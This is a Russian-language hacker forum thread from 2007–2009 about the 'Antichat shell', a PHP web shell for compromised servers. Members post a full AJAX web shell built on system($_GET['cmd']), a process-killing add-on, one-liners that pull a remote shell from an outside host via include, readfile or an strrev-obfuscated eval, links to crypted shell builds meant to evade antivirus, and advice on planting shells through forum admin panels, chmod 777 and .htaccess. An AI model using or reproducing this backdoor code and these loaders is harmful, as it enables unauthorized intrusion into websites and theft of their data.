Да я тоже думал об этом...но мало ли какие-нить хрошие ошибки))А мы же с шелом, так что правим на 0 =)Сенк

GreenBear
11.04.2007, 21:32
аякс бы добавить) месяц назад писал функции....
зочем? лишний код.

grinay
12.04.2007, 01:37
Ком не притензий по поводу кода не предьявлять.Так как этот шелл уже давно ушол в чужие правила.ТОбиш вон те ошибки про сет тайм лимит даже не мои.А времени им заниматься нету.Но возможно выдет версия стейбл.Там плнируеться технология ajax и все в ООП. Половина написана а вот дальше писать времени щас нету..Так что посмотрим во что он превратиться пока от вас))

Isis
12.04.2007, 07:32
Вот думаю....зачем вообще нужно ООП и аякс в каком-то шелле?:)
Ведь самое главное залить шелл, важности не имеет какой он......главное что бы было самое главное....А сам нам аякс?Блин...кода кода много =)

GreenBear
12.04.2007, 10:39
Вот думаю....зачем вообще нужно ООП и аякс в каком-то шелле
+100

Talisman
12.04.2007, 15:20
не согласен. аякс создан для создания удобного интерфейса. объем шелла не проблема, у меня есть отличный лоадер в 17 строчек. сам аякс пока использую только в командере шеллами. и не говорите, что глупо и ни к чему.
для рядового шелла нет смысла делать. для центральной админки - еще какой.
ЗЫ эксперементировал с админкой через виндовую консоль (аля интерфейс текстовый). если интересно, покажу наработки.

0xff
13.04.2007, 00:24
я помню как то энтот шелл нашел на каком то забугорном серванте , думаю чо за нах , секретная разработка думал , аказалось он давно в релизе , просто я его пропустил и поэтому думал что это типа нулль от ачата , а так по идее переделанный phpremview. за дизайен питЁрку ставлю , а за тулзы реализованные -всем хакирам тож питерку . и так думаю веб программерам нужно уже научить скрипт обходить сейф морд ... с ним большинство напрягов бывает .

Isis
04.06.2007, 07:24
Antichat shell (http://rapidshare.com/files/35120428/antichat.txt)
Last update by Isis

n0153r
30.06.2007, 16:55
Shell норм но предлагаю добавить [ Process list ]
echo "<b>[ Процессы в системе ]</b><br>";

echo "<br>";
if ($pid)
{
if (!$sig) {$sig = 9;}
echo "Отправление команды ".$sig." to #".$pid."... ";
$ret = posix_kill($pid,$sig);
if ($ret) {echo "Процесс убит !";}
else {echo "ОШИБКА! ".htmlspecialchars($sig).", в процессе #".htmlspecialchars($pid).".";}
}
$ret = `ps -aux`;
if (!$ret) {echo "<font color=#800000>Невозможно отобразить список процессов!</font>";}
else
{
$ret = htmlspecialchars($ret);
while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);}
$stack = explode("\n",$ret);
$head = explode(" ",$stack[0]);
unset($stack[0]);
if (empty($ps_aux_sort)) {$ps_aux_sort = $sort_default;}
if (!is_numeric($ps_aux_sort[0])) {$ps_aux_sort[0] = 0;}
$k = $ps_aux_sort[0];

$prcs = array();
foreach ($stack as $line)
{
if (!empty($line))
{
echo "<tr>";
$line = explode(" ",$line);
$line[10] = join(" ",array_slice($line,10,count($line)));
$line = array_slice($line,0,11);
$prcs[] = $line;
echo "</tr>";
}
}
$head[$k] = "<b>".$head[$k]."</b>".$y;
$v = $ps_aux_sort[0];
if ($ps_aux_sort[1] == "d") {$prcs = array_reverse($prcs);}
$tab = array();
$tab[] = $head;
$tab = array_merge($tab,$prcs);
echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=white borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
foreach($tab as $k)
{
echo "<tr>";
foreach($k as $v) {echo "<td>".$v."</td>";}
echo "</tr>";
}
echo "</table>";
}

n0153r
04.07.2007, 18:51
Предлагаю сделать еще небольшое дополнения :
выполнения шелл команд можно сделать на Ajax будут немного больше весить на 2 кб
но зато намного удобней выполнять команды !
Вот мой листинг на Ajax :
<?php
if (!empty($_GET['cmd']))system($_GET['cmd']);
else {
?>
<html><head><title>AJAX Shell</title>
<script type="text/javascript" language="javascript">
var CommHis=new Array();
var HisP;
function doReq(_1,_2,_3){var HR=false;
if(window.XMLHttpRequest){HR=new XMLHttpRequest();
if(HR.overrideMimeType){HR.overrideMimeType("text/xml");}}
else{if(window.ActiveXObject){
try{HR=new ActiveXObject("Msxml2.XMLHTTP");}
catch(e){try{HR=new ActiveXObject("Microsoft.XMLHTTP");}
catch(e){}}}}
if(!HR){return false;}
HR.onreadystatechange=function(){if(HR.readyState= =4){
if(HR.status==200){if(_3){eval(_2+"(HR.responseXML)");}
else{eval(_2+"(HR.responseText)");}}}};
HR.open("GET",_1,true);HR.send(null);}
function pR(rS){var _6=document.getElementById("outt");
var _7=rS.split("\n\n");
var _8=document.getElementById("cmd").value;
_6.appendChild(document.createTextNode(_8));
_6.appendChild(document.createElement("br"));
for(var _9 in _7){var _a=document.createElement("pre");
_a.style.display="inline";
line=document.createTextNode(_7[_9]);
_a.appendChild(line);_6.appendChild(_a);
_6.appendChild(document.createElement("br"));}
_6.appendChild(document.createTextNode("[ Shell ]:"));
_6.scrollTop=_6.scrollHeight;
document.getElementById("cmd").value="";}
function keyE(_b){switch(_b.keyCode){
case 13:
var _c=document.getElementById("cmd").value;
if(_c){CommHis[CommHis.length]=_c;
HisP=CommHis.length;
var _d=document.location.href+"?cmd="+escape(_c);
doReq(_d,"pR");}
break;
case 38:
if(HisP>0){HisP--;
document.getElementById("cmd").value=CommHis[HisP];}
break;
case 40:
if(HisP<CommHis.length-1){HisP++;
document.getElementById("cmd").value=CommHis[HisP];}
break;
default:
break;}}
</script></head><body style="font-family:courier" bgcolor=#333333>
<form onsubmit="return false" style="color:#3F0;background:#000;position:relative">
<div id="outt" style="overflow:auto;padding:5px;height:90%">[ Shell ]:</div>
<input onkeyup="keyE(event)" style="color:#FFF;background:#333;width:100%" id="cmd" type="text" />
</form></body></html>
<?php } ?>

Isis
04.07.2007, 20:16
Вставлю в шелл, посмотрим что выйдет..

NApoleonchik
06.07.2007, 17:31
Класный апдейт - мне понравился! Валялась раньше версия постарее - теперь получше

WebeX
18.07.2007, 18:32
У меня вот этот линк умер!
http://sec.antichat.org/antichat.txt

Cawabunga
28.07.2007, 21:29
Прошу извенить за офф топ но может у кавонить остался r57 shell плс выложите его!

WAR!9G
28.07.2007, 22:22
calintz, R57Shell (http://www.rapidshare.ru/356378), пасс: achat

viscount
17.09.2007, 12:48
calintz, R57Shell (http://www.rapidshare.ru/356378), пасс: achat
Не пашет эта Рапида

min7
17.09.2007, 19:06
Не пашет эта Рапида
Вот тебе версия 1.31 на слил (http://slil.ru/24867520) .

Knight_of_Darkness
17.09.2007, 22:42
администрация античата всячески против такого рода проектов, насколько я помню. Думаю, не стоит обьяснять, почему

Mirovan
09.10.2007, 05:21
Пля, НОД палит antichat-шелл , обидно.

Isis
09.10.2007, 07:41
Update:
Antichat Shell (http://www.filemaster.ru/files/h9357) crypt by Isis

[=IZERLI=]
17.10.2007, 17:54
Update:
Antichat Shell (http://www.filemaster.ru/files/h9357) crypt by Isis
У меня не пашет..............:((

guest3297
17.10.2007, 17:56
Скачай нормальный дистрибютив и сам запакуй.

ртуть
22.12.2007, 06:42
похоже, что achatshell загнулся? и его не намерены дальше развивать?

grinay
22.12.2007, 10:44
Как автор начала этого шелла уверяю тебя что он не загнулся-и сейчас я готовклю кандидат релиз шелла - переписанного с нуля..

heks
22.12.2007, 11:42
все равно дума !C99madShell v. 2.1 madnet edition ADVANCED! он уступит

cardons
25.12.2007, 07:42
Шелл супер. Правда хотелось бы чтобы у него был бекконект, коннект MySQL(MSSQL и другим базам).

Spyder
25.12.2007, 11:10
К мускулу есть коннект + дамп таблиц

ртуть
25.12.2007, 11:39
опять комбайны =( этих шеллов куча.... надо на более актуальное ченить переклучаться

-=KitsoK=-
17.02.2008, 11:30
как шел можно в шить в какойнибудь файл *php?

ShAnKaR
17.02.2008, 14:55
как шел можно в шить в какойнибудь файл *php?

readfile("http://xakep.narod.ru/shell.php");

mister
17.02.2008, 15:46
include 'http://xakep.narod.ru/shell.php';;

Isis
17.02.2008, 21:36
<?php
$inc = strrev('eriuqer');
eval($inc('http://xakep.narod.ru/shell.php'));
?>

mister
17.02.2008, 21:43
Isis: зачем eval?

Piflit
17.02.2008, 22:04
чтобы сделать strrev(strrev(strrev('eriuqer')));

desTiny
17.02.2008, 23:48
Isis, шиза=))

m0nsieur
09.04.2008, 12:04
У кого остался последний релиз shell'a, просьба поделиться - хочется посмотреть на это творение.

Isis
10.04.2008, 13:25
http://rapidshare.com/files/35120428/antichat.txt

xXvladXx
11.04.2008, 20:53
Вопще классно!
но на моем мониторе в полях темно красный цвет не виден почти(((
так что я пока останусь на с99 с моими изменениями))

(Dm)
11.04.2008, 23:18
А целом даже очень ничего, только зачем там брут md5, неужто кто-то через веб шелы брутит?
И темно красный цвет напрягает и смотрится на моем мониторе тоже не особо.

m0nsieur
12.04.2008, 11:29
А целом даже очень ничего, только зачем там брут md5, неужто кто-то через веб шелы брутит?
И темно красный цвет напрягает и смотрится на моем мониторе тоже не особо.
Я думаю авторы не обидятся если ты цвет шрифта под себя изменишь.

otmorozok428
05.05.2008, 21:23
Палится уже вовсю

ClamAV Found PHP.ShellExec
CPsecure Found BackDoor.PHP.Rst.F

AnticraZY
07.05.2008, 18:06
Киньте ссылочку плз на описание что такое shell и как он работает

zythar
07.05.2008, 18:09
шелл это такая программа. в нее команду пишешь и она выполняеться (простое объяснение для таких как ты) открой cmd и поймешь что такое шелл.

diznt
07.05.2008, 18:58
zythar Бывает )))

Кто не нашол шелл ачата выкладываю (прошлые страницы не читал)
Скачать шелл ачата (http://ic3drag0n1.netfast.org/php/rar/Antichat%20Shell%20v1.3.rar)

zythar
07.05.2008, 19:04
ок я погорячился. но ведь не трудно сначала погуглить позырить что есть по теме и только потом задавать вопросы такого класса.

Rogun
12.05.2008, 01:35
Как шеллом этим сделать дамп MySQL базы акков?(нужна база акков сервера WoW)

Ещё: почему у меня постоянно (в любом шелле) выскакивает ошибка при переходе на др. диск.ошибка диск отсутствует?хотя он у меня присутствует...

+toxa+
13.05.2008, 00:54
На самом деле имхо как-то позорненько называть такой шелл "шелл античата"

gibson
13.05.2008, 07:56
На самом деле имхо как-то позорненько называть такой шелл "шелл античата"

значит нужно переписать маленьго)

+toxa+
13.05.2008, 08:31
значит нужно переписать маленьго)
флаг в руки. имхо проще стереть и забыть.

Ali_MiX
13.05.2008, 13:08
флаг в руки. имхо проще стереть и забыть.
интересное давольно таки мнение,
ИМХО что есть то есть

zythar
13.05.2008, 16:35
хвать паниковать. тому кому нуно что то тот может взять и переписать шелл на свой лад.
кому не нужно пусть юзает так.
кому не нравиться пусть не юзает.

Input
29.06.2008, 21:50
Весьма не плохой Shell. Жаль функций с database нет.

ozs
05.07.2008, 19:22
перезалейте у кого есть а старая сылка сдохла

otmorozok428
17.07.2008, 23:36
На самом деле имхо как-то позорненько называть такой шелл "шелл античата"

Несмотря на все недостатки, у этого шелла есть один огромный плюс - он лёгкий и быстрый. И пару раз он меня даже сильно выручал в ситуациях, когда r57shell просто тупо повисал и отказывался работать...

Глюконатор
07.08.2008, 14:00
перезалейте у кого есть а старая сылка сдохла

Сцыль Isis'a рабочая. Только что качал. Вот (http://rapidshare.com/files/35120428/antichat.txt).

Nelzone
07.08.2008, 14:20
модификация нужно

DEN-009
07.08.2008, 22:47
Хороший криптор для пинча или других троянов, если понадобится!

Mapkyc_
16.11.2008, 14:15
извеняюсь за глупый вопрос, но я залил шелл на форум зашел в него вроде все норм, но не могу ничего отредактировать пишет
Can't open file, permission denide
Как это исправить ?

[:|||||:]
16.11.2008, 14:17
прав нету, никак :(
ищи файлы/директории с правом записи

Mapkyc_
16.11.2008, 14:38
ну вот нашел тут /home/half/public_html/forums/uploads/ но тут фигня всякая как мне это может пригодится? и можно ли как нибуть получить права ко всем дерикториям? извиняюсь если задаю тупые вопросы, в первые с шелами работаю.

SanyaX
16.11.2008, 21:55
Пробуй chmod file 777
Часто проканывает что права меняются.
Или ищи файлы с правами -rwxrwxrwx, такие можно редактировать.

pvc
22.11.2008, 07:56
Народ объясните если не сложно.
Заливаю на один сайт шелл.
но отоброжается потом только верхняя рабочая часть шелла.
http://www.fanstudio.ru/archive/f.php?img=20081122-nN00446u
заливаю этот же шелл сна своё сервер. и пашет нормальна. хотя судя по настройкам серверов они индиетичны...

MAG0t
10.12.2008, 02:43
как правильно указывать chmod в shell?
chmod file 777 или chmod 777 file ?
и расположения файла как? это зависит от того в какой директории шелл? проясните, пожалуйста

aka PSIH
10.12.2008, 03:31
MAG0t
chmod 777 file

и расположения файла как? это зависит от того в какой директории шелл?
конечно ;) главное путь до файла указать...

MAG0t
10.12.2008, 14:55
Ясно. А на директорию назад как? Например шелл у меня site/shell/achat.php, а надо поставить права 777 на файл site/admin.php

aka PSIH
10.12.2008, 15:04
епт, ну перейди в шелле в корень сайта, и пиши # chmod 777 admin.php
или так
cd ../; chmod 777 admin.php
chmod 777 ../admin.php
вариантов много... ;)

Mapkyc_
19.12.2008, 23:49
У меня вопросик.
Имею досьуп в админку (P.Board 2.3.5 © 2008), заливаю шелл, шелл вроде заливается, но когда пытаюсь на него зайти пишет что типо нету прав для доступа к пхп файлам

Forbidden

You don't have permission to access /uploads/achat.php on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Apache/2.0.63 (Unix) mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5 mod_ssl/2.0.63 OpenSSL/0.9.8i Server at forum.xxxxxx.ru Port 80

Эту проблему можно както устранить ?

Banderos_Russia
20.12.2008, 00:48
права проставить попробуй

DarkMist
28.02.2009, 23:44
блин ну и дела(( ...запустил шелл, подредактировать индех - убил всю страницу нафик(((
понадобавлял (шелл) своих слешей где только можно((

-m0rgan-
10.03.2009, 03:45
Перезалейте плиз...

Rubaka
10.03.2009, 10:36
http://dump.ru/file/1973561
вот лежал какойто!

hackmen
10.03.2009, 13:57
блин ну и дела(( ...запустил шелл, подредактировать индех - убил всю страницу нафик(((
понадобавлял (шелл) своих слешей где только можно((
Кстати, да. Бывает и такое. Интересно почему.

HIVER
13.03.2009, 12:47
Кстати, да. Бывает и такое. Интересно почему.
Потому что шелл должен проверять наличие magic_quotes_gpc=On и делать stripslashes при сохранении в файл в этом случае.

У меня вопросик.
Имею досьуп в админку (P.Board 2.3.5 © 2008), заливаю шелл, шелл вроде заливается, но когда пытаюсь на него зайти пишет что типо нету прав для доступа к пхп файлам

Forbidden

You don't have permission to access /uploads/achat.php on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Apache/2.0.63 (Unix) mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5 mod_ssl/2.0.63 OpenSSL/0.9.8i Server at forum.xxxxxx.ru Port 80

Эту проблему можно както устранить ?
.htaccess

Deny from all

Возможно еще стоит редирект. Залей новый .htaccess в uploads c "Allow from all".

$now
01.05.2009, 14:59
Обнаружил тут такую строчку
Status: Full accees you are can create and delete dir.File not found.
Зачем вышлепыватся и писать по англиски если не получается?

Ctacok
02.05.2009, 08:53
Обнаружил тут такую строчку

Зачем вышлепыватся и писать по англиски если не получается?
Вот когда будешь писать свои скрипты тогда будеш понимать :)
Рука поворачивается сама написать по английски :)
х.з. почему ваще.
ПЫСЫ
кто нить перезалейте шелл?

mailbrush
02.05.2009, 09:53
http://slil.ru/23031654

$now
02.05.2009, 10:06
А еще почему в последней версии нету пароля?

Дикс
03.05.2009, 21:04
Can't open file, permission denide
...

durito
03.05.2009, 22:21
выб сделали, чтоб он антивирями не палился. а то смысл его заливать, если его палят.

Велемир
04.05.2009, 18:39
выб сделали, чтоб он антивирями не палился. а то смысл его заливать, если его палят.

Вы б сделали...вы б написали.А сам не можешь ?))) У автора и так задач много я думаю.


ЗЫЗЫЗЫ: Хошь анпалева? Я не вижу смысла его делать потому,что:

1) Палится чуть не через пару тройку дней.
2)Не выгодно.
3) Если хочется приватности,надыбай в паблике на форумах приват крипторы...Благо,это не так сложно.как может показаться.

winner13
04.05.2009, 23:32
Вот когда будешь писать свои скрипты тогда будеш понимать :)
Рука поворачивается сама написать по английски :)
х.з. почему ваще.
ПЫСЫ
кто нить перезалейте шелл?
шелл сам по себе отличный,но палится зараза,а криптовать нету смысла каждый раз проще другие релизы шелов юзать .И тут с тобой не согласен на счет полной русификации,всё таки если есть возможность писать по русский , лучше это делать по русский. Так и ценится будет больше , и приятней юзать своим во всех отношениях.

$now
05.05.2009, 00:07
Рука поворачивается сама написать по английски :)

Потомучто модно. Да я не спорю ради бога только язык учить надо если хочется. Ты бы как отнесся к надписи, написаной узбеком еле белекающим по русски? (против узбеков ничего не имею)

Nik(rus)
10.07.2009, 20:37
Вот нечем было заняться перевел 1.2 :D
Функциональность на прежнем уровне, тока поменял A: на C: диск.
Скачать с DepositFiles (http://depositfiles.com/files/cdz11ec11)
Скачать с OpenFile (http://openfile.ru/333032/)
Скачать с Rapidshare (http://rapidshare.com/files/254243705/anti.php.html)
Скачать с FileShare (http://fileshare.in.ua/2107815)
Скачать с LetItBit (http://letitbit.net/download/4467.a4bfd12ebfb36fcb04188a3c8/anti.php.html)

delux
12.07.2009, 17:27
не всегда корректно работает